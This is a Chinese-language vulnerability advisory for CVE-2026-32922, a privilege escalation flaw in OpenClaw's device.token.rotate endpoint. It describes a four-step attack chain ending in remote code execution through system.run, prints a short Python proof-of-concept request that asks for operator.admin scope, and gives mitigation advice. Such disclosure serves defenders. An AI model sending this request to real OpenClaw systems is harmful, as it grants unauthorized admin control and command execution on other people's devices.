CVE-2026-32922 CVSS 9.9 严重

CVE-2026-32922 OpenClaw权限提升漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32922

漏洞类型

权限提升

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.11之前版本存在严重权限提升漏洞。由于`device.token.rotate`接口未严格限制令牌范围，拥有`operator.pairing`权限的攻击者可伪造高权限令牌。利用此漏洞，攻击者可获得`operator.admin`权限，进而通过`system.run`在节点上执行远程代码，危及系统安全。

技术细节

该漏洞源于OpenClaw的`device.token.rotate`功能在处理令牌更新时存在逻辑缺陷。系统未验证请求者当前的权限范围是否允许申请新的权限范围，导致权限约束失效。具体而言，攻击者仅需具备低权限的`operator.pairing`作用域，即可调用该接口并指定更高权限的`operator.admin`作用域生成令牌。一旦获取管理员令牌，攻击者可利用系统的`system.run`功能在已配对的设备节点上执行任意系统命令，实现完全的远程代码执行（RCE），或者直接获取网关的管理员控制权。

攻击链分析

STEP 1

1. 初始访问

攻击者获取一个具有operator.pairing权限的低权限令牌。

STEP 2

2. 漏洞利用

攻击者调用device.token.rotate接口，并在请求中将scope参数设置为operator.admin，绕过权限检查。

STEP 3

3. 权限提升

系统返回一个新的具有operator.admin权限的令牌，攻击者成功提升权限。

STEP 4

4. 执行攻击

利用管理员令牌调用system.run接口，在连接的设备节点上执行任意系统命令，实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32922: OpenClaw Privilege Escalation
# Attacker needs operator.pairing scope
import requests

target_url = "https://<openclaw-host>/api/device/token/rotate"
headers = {
    "Authorization": "Bearer <operator_pairing_token>",
    "Content-Type": "application/json"
}

# Exploit: requesting higher scope (operator.admin) than held
payload = {
    "new_scope": "operator.admin",
    "device_id": "<target_device_id>"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Exploit successful! New token obtained:")
    print(response.json().get("token"))
else:
    print("[-] Exploit failed")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面限制对`device.token.rotate`接口的访问，仅允许受信任的内部IP调用。同时，严格审查并撤销所有非必要的`operator.pairing`权限令牌，监控异常的令牌刷新请求和管理员登录日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表